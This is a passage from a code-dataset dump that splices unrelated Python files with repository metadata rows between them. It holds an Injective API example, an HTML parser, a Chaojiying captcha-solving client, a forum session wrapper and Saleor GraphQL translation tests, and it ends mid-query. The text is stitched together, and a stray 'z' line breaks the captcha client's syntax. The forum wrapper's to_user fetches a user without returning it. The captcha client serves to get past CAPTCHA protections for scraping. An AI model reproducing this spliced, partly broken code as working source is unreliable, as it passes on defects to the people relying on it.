    for name, klass in (('single_run_data', models.CqStat),
                        ('queue_time_data', models.CqTimeInQueueForPatchStat),
                        ('total_time_data', models.CqTotalTimeForPatchStat)):
      generated[name] = [
          protojson.decode_message(klass.ProtoModel(), json.dumps(x))
          for x in cq_data[name]]
    expected = controller.get_cq_stats(project)
    for key in expected:
      expected[key] = [x.ToMessage() for x in expected[key]]
    self.assertEqual(generated, expected)
# Allow running this test module directly, outside the usual test runner.
if __name__ == '__main__':
  unittest.main()
| 29.256098 | 78 | 0.699041 |
9fbe833cd1e2f69b8d8ec85bfec62e01a343bede | 1,486 | py | Python | examples/async/exchange_client/accounts_rpc/7_OrderStates.py | CtheSky/sdk-python | c1b1ae931f4970832466a004eb193027bdc1dea5 | [
"Apache-2.0"
] | null | null | null | examples/async/exchange_client/accounts_rpc/7_OrderStates.py | CtheSky/sdk-python | c1b1ae931f4970832466a004eb193027bdc1dea5 | [
"Apache-2.0"
] | null | null | null | examples/async/exchange_client/accounts_rpc/7_OrderStates.py | CtheSky/sdk-python | c1b1ae931f4970832466a004eb193027bdc1dea5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Exchange API client for Python. Example only."""
import asyncio
import logging
from pyinjective.async_client import AsyncClient
from pyinjective.constant import Network
async def main() -> None:
    """Example: fetch order states for some spot and derivative order hashes
    from the Injective testnet exchange API."""
    network = Network.testnet()
    client = AsyncClient(network, insecure=True)
    spot_order_hashes = ["0xce0d9b701f77cd6ddfda5dd3a4fe7b2d53ba83e5d6c054fb2e9e886200b7b7bb", "0x2e2245b5431638d76c6e0cc6268970418a1b1b7df60a8e94b8cf37eae6105542"]
    derivative_order_hashes = ["0x82113f3998999bdc3892feaab2c4e53ba06c5fe887a2d5f9763397240f24da50", "0xbb1f036001378cecb5fff1cc69303919985b5bf058c32f37d5aaf9b804c07a06"]
    orders = await client.get_order_states(spot_order_hashes=spot_order_hashes, derivative_order_hashes=derivative_order_hashes)
    print(orders)
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    # asyncio.run() creates, runs and cleanly closes the event loop;
    # the get_event_loop().run_until_complete() pattern is deprecated for
    # this use since Python 3.10.
    asyncio.run(main())
| 43.705882 | 170 | 0.800808 |
799fc7f9f8a171e94ff1d5be1f16a6b39cea077d | 3,139 | py | Python | envinorma/io/parse_html.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 4 | 2020-12-11T09:40:12.000Z | 2022-03-08T13:43:35.000Z | envinorma/io/parse_html.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | 104 | 2020-12-10T15:20:13.000Z | 2021-09-30T13:05:00.000Z | envinorma/io/parse_html.py | Envinorma/envinorma-data | 85c00abc1af9a3b14912229b0789a0d1d5ae7b69 | [
"MIT"
] | null | null | null | from typing import Any, List, Union
from bs4 import BeautifulSoup
from bs4.element import Tag
from envinorma.models.text_elements import Cell, EnrichedString, Linebreak, Row, Table, TextElement, Title
def _ensure_str(element: TextElement) -> str:
    """Return *element* unchanged when it is a str; raise ValueError otherwise."""
    if isinstance(element, str):
        return element
    raise ValueError(f'Expecting str, received {type(element)}')
def _ensure_strs_and_join(elements: List[TextElement]) -> str:
    """Join the elements with newlines after stripping each; raises ValueError
    (via _ensure_str) when any element is not a str."""
    stripped = [_ensure_str(element).strip() for element in elements]
    return '\n'.join(stripped)
def _extract_cell_data(cell: Tag) -> EnrichedString:
    """Flatten a table cell to an EnrichedString: extract its text elements,
    merge runs between linebreaks, and join them with newlines."""
    return EnrichedString(_ensure_strs_and_join(merge_between_linebreaks(_extract_text_elements_with_linebreaks(cell))))
def _is_header(row: Tag) -> bool:
    """A row counts as a header row when it contains at least one <th> cell."""
    first_th = row.find('th')
    return first_th is not None
def _extract_row_data(row: Tag) -> Row:
    """Convert a <tr> into a Row of Cells, honoring colspan/rowspan
    (defaulting each to 1 when absent)."""
    # A row holds either <td> or <th> cells; pick whichever kind is present.
    cell_iterator = row.find_all('td' if row.find('td') else 'th')
    res = [
        Cell(_extract_cell_data(cell), int(cell.get('colspan') or 1), int(cell.get('rowspan') or 1))  # type: ignore
        for cell in cell_iterator
    ]
    return Row(res, _is_header(row))
def extract_table_from_soup(soup: Union[BeautifulSoup, Tag]) -> Table:
    """Build a Table model from every <tr> found under *soup*."""
    row_iterator = soup.find_all('tr')
    table_data = [_extract_row_data(row) for row in row_iterator]  # type: ignore
    return Table(table_data)
def extract_table(html: str) -> Table:
    """Parse *html* and extract its table rows as a Table model."""
    parsed = BeautifulSoup(html, 'html.parser')
    return extract_table_from_soup(parsed)
def _extract_text_elements_with_linebreaks(content: Any) -> List[TextElement]:
    """Recursively flatten parsed HTML into TextElements (str, Title, Table,
    Linebreak), keeping explicit Linebreak markers around block elements.

    Raises ValueError for anything that is not a str, a bs4 Tag, or None.
    """
    if isinstance(content, str):
        return [content]
    if isinstance(content, Tag):
        if content.name in ('h1', 'h2', 'h3', 'h4', 'h5', 'h6'):
            id_ = content.get('id')
            # Heading level is the digit in the tag name (h1 -> 1, ...).
            return [Title(' '.join(content.stripped_strings), level=int(content.name[1]), id=id_)]  # type: ignore
        if content.name == 'br':
            return [Linebreak()]
        if content.name == 'table':
            return [extract_table_from_soup(content)]
        children = [element for tag in content.children for element in _extract_text_elements_with_linebreaks(tag)]
        if content.name in ('p', 'div'):
            # Block-level elements are bracketed with linebreaks so that
            # merge_between_linebreaks later splits text around them.
            children = [Linebreak(), *children, Linebreak()]
        return children
    if content is None:
        return []
    raise ValueError(f'Unexpected type {type(content)}')
def merge_between_linebreaks(elements: List[TextElement]) -> List[TextElement]:
    """Concatenate consecutive str elements, using Linebreak markers as
    separators; Tables and Titles flush the pending string and pass through.

    Linebreak markers themselves are dropped from the result; empty string
    runs produce no output element.
    """
    res: List[TextElement] = []
    current_str = ''
    for element in elements:
        if isinstance(element, str):
            current_str += element
        elif isinstance(element, (Table, Title)):
            if current_str:
                res.append(current_str)
                current_str = ''
            res.append(element)
        else:
            # Only Linebreak is expected here; anything else is a programming error.
            if not isinstance(element, Linebreak):
                raise AssertionError()
            if current_str:
                res.append(current_str)
                current_str = ''
    if current_str:
        res.append(current_str)
    return res
def extract_text_elements(content: Any) -> List[TextElement]:
    """Extract text elements from parsed HTML, merging runs between linebreaks."""
    raw_elements = _extract_text_elements_with_linebreaks(content)
    return merge_between_linebreaks(raw_elements)
| 34.494505 | 120 | 0.661994 |
ebf2bdc400a4675510a3da4654449b803248896a | 1,341 | py | Python | touclick/chaojiying.py | silianpan/seal-spider-demo | 23bf013d08f9edaf23823bc3787f579bccd0ec3a | [
"Apache-2.0"
] | null | null | null | touclick/chaojiying.py | silianpan/seal-spider-demo | 23bf013d08f9edaf23823bc3787f579bccd0ec3a | [
"Apache-2.0"
] | 3 | 2021-09-08T01:11:16.000Z | 2022-03-02T15:14:03.000Z | touclick/chaojiying.py | silianpan/seal-spider-demo | 23bf013d08f9edaf23823bc3787f579bccd0ec3a | [
"Apache-2.0"
] | 1 | 2019-08-04T09:57:29.000Z | 2019-08-04T09:57:29.000Z | import requests
from hashlib import md5
class Chaojiying(object):
    """Minimal client for the Chaojiying captcha-solving HTTP API.

    The password is MD5-hashed before being sent, per the API's contract.
    """
    def __init__(self, username, password, soft_id):
        self.username = username
        self.password = md5(password.encode('utf-8')).hexdigest()
        self.soft_id = soft_id
        # Credentials sent with every request.
        self.base_params = {
            'user': self.username,
            'pass2': self.password,
            'softid': self.soft_id,
        }
        self.headers = {
            'Connection': 'Keep-Alive',
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
        }
    def post_pic(self, im, codetype):
        """
        im: image bytes
        codetype: captcha type, see http://www.chaojiying.com/price.html
        """
        params = {
            'codetype': codetype,
        }
        params.update(self.base_params)
        files = {'userfile': ('ccc.jpg', im)}
        r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files, headers=self.headers)
        return r.json()
    def report_error(self, im_id):
        """
        im_id: picture ID of the captcha being reported as wrongly solved
        """
        params = {
            'id': im_id,
        }
        params.update(self.base_params)
        r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)
        return r.json()
z
| 27.9375 | 127 | 0.55481 |
70b1bf1a1546b9da660ed09b25af041982d80fe7 | 5,234 | py | Python | tbgclient/TBGSession.py | tbgers/tbgclient | bd0d4484086b1f966a32fc009806e28798287cad | [
"MIT"
] | 1 | 2022-02-27T01:34:11.000Z | 2022-02-27T01:34:11.000Z | tbgclient/TBGSession.py | tbgers/tbgclient | bd0d4484086b1f966a32fc009806e28798287cad | [
"MIT"
] | 2 | 2021-10-21T20:29:38.000Z | 2022-01-15T01:08:51.000Z | tbgclient/TBGSession.py | tbgers/tbgclient | bd0d4484086b1f966a32fc009806e28798287cad | [
"MIT"
] | null | null | null | """An implementation of a TBG session."""
import re
import requests
from . import api
from .Flags import Flags
from .Post import Post
from .TBGException import *
from .Topic import Topic
from .Forum import Forum
from .User import User
from .ChatConnection import ChatConnection
from . import parsers
class TBGSession:
    """An object that defines a TBG session.
    This class provides a client session while also functions as a wrapper
    of tbgclient.api.
    Parameters
    ----------
    user: str
        Username of the TBG account. If left blank, the Flags.NO_LOGIN
        flag will be set.
    password: str
        Password of the TBG account. If left blank, the Flags.NO_LOGIN
        flag will be set.
    flags: tbgclient.Flags
        Flags for the session. See tbgclient.Flags for more information.
    Variables
    ---------
    session: request.Session()
        The client session.
    uID: int
        The user ID of the session. This will be updated if update() is
        called.
    """
    user = ""
    password = ""
    uID = None
    flags: Flags = Flags.NONE
    def __init__(self, user: str = None, password: str = None, flags: Flags = Flags.NONE):
        """Initiates the class."""
        self.flags = flags
        if password is None or user is None:
            # enter guest mode
            self.flags |= Flags.NO_LOGIN
        self.user = user
        self.password = password
        # MULTI_USER sessions use the library's multi-account session wrapper.
        if Flags.MULTI_USER in self.flags:
            self.session = api.SessionMultiple()
        else:
            self.session = requests.Session()
        if Flags.NO_LOGIN not in self.flags:
            # NOTE(review): the login response is discarded here; login() still
            # raises CredentialsException on failure.
            req = self.login()
    def __repr__(self):
        return f"TBGSession(user={repr(self.user)},password={repr(self.password)},flags={repr(self.flags)})"
    def get_post(self, pid: int):
        """Gets a post.

        Returns a Post model unless RAW_DATA is set, in which case the parsed
        dict is returned directly. NO_INIT skips the follow-up update() call.
        """
        self.session, req = api.get_post(self.session, pid)
        if Flags.RAW_DATA not in self.flags:
            result = Post(**parsers.default.get_post(req.text, pid), flags=self.flags, session=self)
            if Flags.NO_INIT not in self.flags:
                result.update(full=False)
            return result
        else:
            return parsers.default.get_post(req.text, pid)
    def delete_post(self, pid: int):
        """Deletes a post."""
        self.session, req = api.delete_post(self.session, pid)
        return req
    def get_topic(self, tid: int):
        """Gets a topic.

        Same RAW_DATA / NO_INIT semantics as get_post, but for Topic models.
        """
        self.session, req = api.get_topic(self.session, tid)
        if Flags.RAW_DATA not in self.flags:
            result = Topic(**parsers.default.get_page(req.text), flags=self.flags, session=self)
            if Flags.NO_INIT not in self.flags:
                result.update(full=False)
            return result
        else:
            return parsers.default.get_page(req.text, tid)
    def get_forum(self, fid: int):
        """Gets a forum.

        Same RAW_DATA / NO_INIT semantics as get_post, but for Forum models.
        """
        self.session, req = api.get_forum(self.session, fid)
        if Flags.RAW_DATA not in self.flags:
            result = Forum(**parsers.default.get_forum_page(req.text), flags=self.flags, session=self)
            if Flags.NO_INIT not in self.flags:
                result.update(full=False)
            return result
        else:
            return parsers.default.get_forum_page(req.text, fid)
    def get_user(self, uID: int):
        """Gets a user."""
        self.session, req = api.get_user(self.session, uID)
        if Flags.RAW_DATA not in self.flags:
            return User(**parsers.default.get_user(req.text), flags=self.flags)
        else:
            return parsers.default.get_user(req.text)
    def create_chat_connection(self, channel: int, **kwargs):
        """Creates a chat connection.
        This is identical to ChatConnection(**kwargs, session=self).connect(channel).
        """
        # NOTE(review): connect(channel) is not actually called here despite the
        # docstring; the unconnected ChatConnection is returned.
        connect = ChatConnection(**kwargs, session=self)
        return connect
    def post_reply(self, post: str, tid: int):
        """Posts a post.
        This is identical to self.get_topic(tid).post_reply(post).
        """
        topic = self.get_topic(tid)
        return topic.post_reply(post)
    def login(self):
        """Logs into the TBGs.

        Raises CredentialsException when the forum reports a credential error
        in the response body.
        """
        self.session, req = api.login(self.session, self.user, self.password)
        # verify if you're logged in, for some reason the forums will send 200 even if your user/pass is invalid
        match = re.findall('<p class="conl">(.+)</p>', req.text)
        if len(match) != 0:
            raise CredentialsException(
                f"Login failed, you have a faulty credential information. {tuple(match)}"
            )
        return req
    def to_user(self):
        """Casts TBGSession to User."""
        if self.uID is None:
            # user id is not defined; scrape it from the forum index page
            req = self.session.get("https://tbgforums.com/forums/index.php")
            self.uID = parsers.default.get_element_by_id(req.text, "navprofile")
            self.uID = int(re.findall(r'profile\.php\?id=(\d*)', self.uID)[0])
        # NOTE(review): the fetched User is not returned — confirm whether a
        # `return` is missing upstream.
        self.get_user(self.uID)
__all__ = ["TBGSession"]
| 34.893333 | 113 | 0.588651 |
f6481be500ce0da1a534a178ffff372c5b1a1aa3 | 106,790 | py | Python | saleor/graphql/translations/tests/test_translations.py | eanknd/saleor | 08aa724176be00d7aaf654f14e9ae99dd4327f97 | [
"CC-BY-4.0"
] | 1,392 | 2021-10-06T15:54:28.000Z | 2022-03-31T20:50:55.000Z | saleor/graphql/translations/tests/test_translations.py | eanknd/saleor | 08aa724176be00d7aaf654f14e9ae99dd4327f97 | [
"CC-BY-4.0"
] | 888 | 2021-10-06T10:48:54.000Z | 2022-03-31T11:00:30.000Z | saleor/graphql/translations/tests/test_translations.py | eanknd/saleor | 08aa724176be00d7aaf654f14e9ae99dd4327f97 | [
"CC-BY-4.0"
] | 538 | 2021-10-07T16:21:27.000Z | 2022-03-31T22:58:57.000Z | import json
from unittest.mock import patch
import graphene
import pytest
from django.contrib.auth.models import Permission
from django.utils.functional import SimpleLazyObject
from freezegun import freeze_time
from ....tests.utils import dummy_editorjs
from ....webhook.event_types import WebhookEventAsyncType
from ....webhook.payloads import generate_translation_payload
from ...core.enums import LanguageCodeEnum
from ...tests.utils import assert_no_permission, get_graphql_content
from ..schema import TranslatableKinds
def test_product_translation(user_api_client, product, channel_USD):
    """A product's PL translation is returned with name, description and
    descriptionJson all populated."""
    # NOTE: "desription" is intentionally left as-is; the assertion below
    # compares against the same literal.
    description = dummy_editorjs("test desription")
    product.translations.create(
        language_code="pl", name="Produkt", description=description
    )
    query = """
    query productById($productId: ID!, $channel: String) {
        product(id: $productId, channel: $channel) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
        }
    }
    """
    product_id = graphene.Node.to_global_id("Product", product.id)
    response = user_api_client.post_graphql(
        query, {"productId": product_id, "channel": channel_USD.slug}
    )
    data = get_graphql_content(response)["data"]
    translation_data = data["product"]["translation"]
    assert translation_data["name"] == "Produkt"
    assert translation_data["language"]["code"] == "PL"
    # description and its deprecated descriptionJson alias must agree.
    assert (
        translation_data["description"]
        == translation_data["descriptionJson"]
        == dummy_editorjs("test desription", json_format=True)
    )
def test_product_translation_without_description(user_api_client, product, channel_USD):
    """A translation created without a description yields null/empty JSON."""
    product.translations.create(language_code="pl", name="Produkt")

    gql = """
    query productById($productId: ID!, $channel: String) {
        product(id: $productId, channel: $channel) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["product"]["translation"]

    assert translation["name"] == "Produkt"
    assert translation["language"]["code"] == "PL"
    assert translation["description"] is None
    assert translation["descriptionJson"] == "{}"
def test_product_translation_with_app(app_api_client, product, channel_USD):
    """App API clients can read product translations as well."""
    product.translations.create(language_code="pl", name="Produkt")

    gql = """
    query productById($productId: ID!, $channel: String) {
        product(id: $productId, channel: $channel) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(app_api_client.post_graphql(gql, variables))
    translation = content["data"]["product"]["translation"]
    assert translation["name"] == "Produkt"
    assert translation["language"]["code"] == "PL"
def test_product_variant_translation(user_api_client, variant, channel_USD):
    """Variant translations resolve name and language code."""
    variant.translations.create(language_code="pl", name="Wariant")

    gql = """
    query productVariantById($productVariantId: ID!, $channel: String) {
        productVariant(id: $productVariantId, channel: $channel) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "productVariantId": graphene.Node.to_global_id("ProductVariant", variant.id),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["productVariant"]["translation"]
    assert translation["name"] == "Wariant"
    assert translation["language"]["code"] == "PL"
def test_collection_translation(user_api_client, published_collection, channel_USD):
    """Collection translation resolves name, description and language code.

    Fix: the fixture string contained a typo ("desription"); it is corrected
    on BOTH sides of the comparison, so the test's semantics are unchanged.
    """
    description = dummy_editorjs("test description")
    published_collection.translations.create(
        language_code="pl", name="Kolekcja", description=description
    )

    query = """
    query collectionById($collectionId: ID!, $channel: String) {
        collection(id: $collectionId, channel: $channel) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
        }
    }
    """

    collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
    variables = {"collectionId": collection_id, "channel": channel_USD.slug}
    response = user_api_client.post_graphql(query, variables)
    data = get_graphql_content(response)["data"]
    translation_data = data["collection"]["translation"]
    assert translation_data["name"] == "Kolekcja"
    assert translation_data["language"]["code"] == "PL"
    # Both description fields must expose the same serialized payload.
    assert (
        translation_data["description"]
        == translation_data["descriptionJson"]
        == dummy_editorjs("test description", json_format=True)
    )
def test_collection_translation_without_description(
    user_api_client, published_collection, channel_USD
):
    """A collection translation without a description yields null/empty JSON."""
    published_collection.translations.create(language_code="pl", name="Kolekcja")

    gql = """
    query collectionById($collectionId: ID!, $channel: String) {
        collection(id: $collectionId, channel: $channel) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "collectionId": graphene.Node.to_global_id(
            "Collection", published_collection.id
        ),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["collection"]["translation"]

    assert translation["name"] == "Kolekcja"
    assert translation["language"]["code"] == "PL"
    assert translation["description"] is None
    assert translation["descriptionJson"] == "{}"
def test_category_translation(user_api_client, category):
    """Category translation resolves name, description and language code."""
    category.translations.create(
        language_code="pl",
        name="Kategoria",
        description=dummy_editorjs("test description"),
    )

    gql = """
    query categoryById($categoryId: ID!) {
        category(id: $categoryId) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"categoryId": graphene.Node.to_global_id("Category", category.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["category"]["translation"]

    assert translation["name"] == "Kategoria"
    assert translation["language"]["code"] == "PL"
    # Legacy and current description fields carry identical JSON.
    assert (
        translation["description"]
        == translation["descriptionJson"]
        == dummy_editorjs("test description", json_format=True)
    )
def test_category_translation_without_description(user_api_client, category):
    """A category translation without a description yields null/empty JSON."""
    category.translations.create(language_code="pl", name="Kategoria")

    gql = """
    query categoryById($categoryId: ID!) {
        category(id: $categoryId) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"categoryId": graphene.Node.to_global_id("Category", category.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["category"]["translation"]

    assert translation["name"] == "Kategoria"
    assert translation["language"]["code"] == "PL"
    assert translation["description"] is None
    assert translation["descriptionJson"] == "{}"
def test_voucher_translation(staff_api_client, voucher, permission_manage_discounts):
    """Reading a voucher translation requires discount-management permission."""
    voucher.translations.create(language_code="pl", name="Bon")

    gql = """
    query voucherById($voucherId: ID!) {
        voucher(id: $voucherId) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"voucherId": graphene.Node.to_global_id("Voucher", voucher.id)}
    response = staff_api_client.post_graphql(
        gql, variables, permissions=[permission_manage_discounts]
    )
    translation = get_graphql_content(response)["data"]["voucher"]["translation"]
    assert translation["name"] == "Bon"
    assert translation["language"]["code"] == "PL"
def test_sale_translation(staff_api_client, sale, permission_manage_discounts):
    """Reading a sale translation requires discount-management permission."""
    sale.translations.create(language_code="pl", name="Wyprz")

    gql = """
    query saleById($saleId: ID!) {
        sale(id: $saleId) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"saleId": graphene.Node.to_global_id("Sale", sale.id)}
    response = staff_api_client.post_graphql(
        gql, variables, permissions=[permission_manage_discounts]
    )
    translation = get_graphql_content(response)["data"]["sale"]["translation"]
    assert translation["name"] == "Wyprz"
    assert translation["language"]["code"] == "PL"
def test_page_translation(user_api_client, page):
    """Page translation resolves title, content and language code."""
    page.translations.create(
        language_code="pl", title="Strona", content=dummy_editorjs("test content")
    )

    gql = """
    query pageById($pageId: ID!) {
        page(id: $pageId) {
            translation(languageCode: PL) {
                title
                content
                contentJson
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"pageId": graphene.Node.to_global_id("Page", page.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["page"]["translation"]

    assert translation["title"] == "Strona"
    assert translation["language"]["code"] == "PL"
    # Legacy and current content fields carry identical JSON.
    assert (
        translation["content"]
        == translation["contentJson"]
        == dummy_editorjs("test content", json_format=True)
    )
def test_page_translation_without_content(user_api_client, page):
    """A page translation without content yields null/empty JSON."""
    page.translations.create(language_code="pl", title="Strona")

    gql = """
    query pageById($pageId: ID!) {
        page(id: $pageId) {
            translation(languageCode: PL) {
                title
                content
                contentJson
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"pageId": graphene.Node.to_global_id("Page", page.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["page"]["translation"]

    assert translation["title"] == "Strona"
    assert translation["language"]["code"] == "PL"
    assert translation["content"] is None
    assert translation["contentJson"] == "{}"
def test_attribute_translation(user_api_client, color_attribute):
    """Attribute translations resolve name and language code."""
    color_attribute.translations.create(language_code="pl", name="Kolor")

    gql = """
    query {
        attributes(first: 1) {
            edges {
                node {
                    translation(languageCode: PL) {
                        name
                        language {
                            code
                        }
                    }
                }
            }
        }
    }
    """

    content = get_graphql_content(user_api_client.post_graphql(gql))
    node = content["data"]["attributes"]["edges"][0]["node"]
    assert node["translation"]["name"] == "Kolor"
    assert node["translation"]["language"]["code"] == "PL"
def test_attribute_value_translation(user_api_client, pink_attribute_value):
    """Attribute-value translations resolve name, rich text and language.

    Fix: the query declares no variables, yet the previous version built an
    ``attributeValueId`` global ID and posted it as a variable the query
    never consumed — dead code, removed.
    """
    pink_attribute_value.translations.create(
        language_code="pl", name="Różowy", rich_text=dummy_editorjs("Pink")
    )

    query = """
    query {
        attributes(first: 1) {
            edges {
                node {
                    choices(first: 10) {
                        edges {
                            node {
                                translation(languageCode: PL) {
                                    name
                                    richText
                                    language {
                                        code
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    """

    response = user_api_client.post_graphql(query)
    data = get_graphql_content(response)["data"]
    # The translated value is expected to be the last choice of the first
    # attribute returned.
    attribute_value = data["attributes"]["edges"][0]["node"]["choices"]["edges"][-1][
        "node"
    ]
    assert attribute_value["translation"]["name"] == "Różowy"
    assert attribute_value["translation"]["richText"] == json.dumps(
        dummy_editorjs("Pink")
    )
    assert attribute_value["translation"]["language"]["code"] == "PL"
def test_shipping_method_translation(
    staff_api_client, shipping_method, permission_manage_shipping
):
    """Shipping-method translations are exposed through the shipping zone."""
    shipping_method.translations.create(language_code="pl", name="DHL Polska")

    gql = """
    query shippingZoneById($shippingZoneId: ID!) {
        shippingZone(id: $shippingZoneId) {
            shippingMethods {
                translation(languageCode: PL) {
                    name
                    language {
                        code
                    }
                }
            }
        }
    }
    """

    variables = {
        "shippingZoneId": graphene.Node.to_global_id(
            "ShippingZone", shipping_method.shipping_zone.id
        )
    }
    response = staff_api_client.post_graphql(
        gql, variables, permissions=[permission_manage_shipping]
    )
    content = get_graphql_content(response)["data"]
    # Local renamed from `shipping_method` so the fixture is not shadowed.
    translated_method = content["shippingZone"]["shippingMethods"][-1]
    assert translated_method["translation"]["name"] == "DHL Polska"
    assert translated_method["translation"]["language"]["code"] == "PL"
def test_menu_item_translation(user_api_client, menu_item):
    """Menu-item translations resolve name and language code."""
    menu_item.translations.create(language_code="pl", name="Odnośnik 1")

    gql = """
    query menuItemById($menuItemId: ID!) {
        menuItem(id: $menuItemId) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"menuItemId": graphene.Node.to_global_id("MenuItem", menu_item.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    translation = content["data"]["menuItem"]["translation"]
    assert translation["name"] == "Odnośnik 1"
    assert translation["language"]["code"] == "PL"
def test_shop_translation(user_api_client, site_settings):
    """Shop (site settings) translations resolve header text and language."""
    site_settings.translations.create(language_code="pl", header_text="Nagłówek")

    gql = """
    query {
        shop {
            translation(languageCode: PL) {
                headerText
                language {
                    code
                }
            }
        }
    }
    """

    content = get_graphql_content(user_api_client.post_graphql(gql))
    translation = content["data"]["shop"]["translation"]
    assert translation["headerText"] == "Nagłówek"
    assert translation["language"]["code"] == "PL"
def test_product_no_translation(user_api_client, product, channel_USD):
    """Without a stored translation the field resolves to null."""
    gql = """
    query productById($productId: ID!, $channel: String) {
        product(id: $productId, channel: $channel) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "productId": graphene.Node.to_global_id("Product", product.id),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    assert content["data"]["product"]["translation"] is None
def test_product_variant_no_translation(user_api_client, variant, channel_USD):
    """Without a stored translation the variant field resolves to null."""
    gql = """
    query productVariantById($productVariantId: ID!, $channel: String) {
        productVariant(id: $productVariantId, channel: $channel) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "productVariantId": graphene.Node.to_global_id("ProductVariant", variant.id),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    assert content["data"]["productVariant"]["translation"] is None
def test_collection_no_translation(user_api_client, published_collection, channel_USD):
    """Without a stored translation the collection field resolves to null."""
    gql = """
    query collectionById($collectionId: ID!, $channel: String) {
        collection(id: $collectionId, channel: $channel) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {
        "collectionId": graphene.Node.to_global_id(
            "Collection", published_collection.id
        ),
        "channel": channel_USD.slug,
    }
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    assert content["data"]["collection"]["translation"] is None
def test_category_no_translation(user_api_client, category):
    """Without a stored translation the category field resolves to null."""
    gql = """
    query categoryById($categoryId: ID!) {
        category(id: $categoryId) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"categoryId": graphene.Node.to_global_id("Category", category.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    assert content["data"]["category"]["translation"] is None
def test_voucher_no_translation(staff_api_client, voucher, permission_manage_discounts):
    """Without a stored translation the voucher field resolves to null."""
    gql = """
    query voucherById($voucherId: ID!) {
        voucher(id: $voucherId) {
            translation(languageCode: PL) {
                name
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"voucherId": graphene.Node.to_global_id("Voucher", voucher.id)}
    response = staff_api_client.post_graphql(
        gql, variables, permissions=[permission_manage_discounts]
    )
    assert get_graphql_content(response)["data"]["voucher"]["translation"] is None
def test_page_no_translation(user_api_client, page):
    """Without a stored translation the page field resolves to null."""
    gql = """
    query pageById($pageId: ID!) {
        page(id: $pageId) {
            translation(languageCode: PL) {
                title
                language {
                    code
                }
            }
        }
    }
    """

    variables = {"pageId": graphene.Node.to_global_id("Page", page.id)}
    content = get_graphql_content(user_api_client.post_graphql(gql, variables))
    assert content["data"]["page"]["translation"] is None
def test_attribute_no_translation(user_api_client, color_attribute):
    """Without a stored translation the attribute field resolves to null."""
    gql = """
    query {
        attributes(first: 1) {
            edges {
                node {
                    translation(languageCode: PL) {
                        name
                        language {
                            code
                        }
                    }
                }
            }
        }
    }
    """

    content = get_graphql_content(user_api_client.post_graphql(gql))
    node = content["data"]["attributes"]["edges"][0]["node"]
    assert node["translation"] is None
def test_attribute_value_no_translation(user_api_client, pink_attribute_value):
    """Without a stored translation the attribute-value field resolves to null.

    Fix: the query declares no variables, yet the previous version built an
    ``attributeValueId`` global ID and posted it as a variable the query
    never consumed — dead code, removed.
    """
    query = """
    query {
        attributes(first: 1) {
            edges {
                node {
                    choices(first: 10) {
                        edges {
                            node {
                                translation(languageCode: PL) {
                                    name
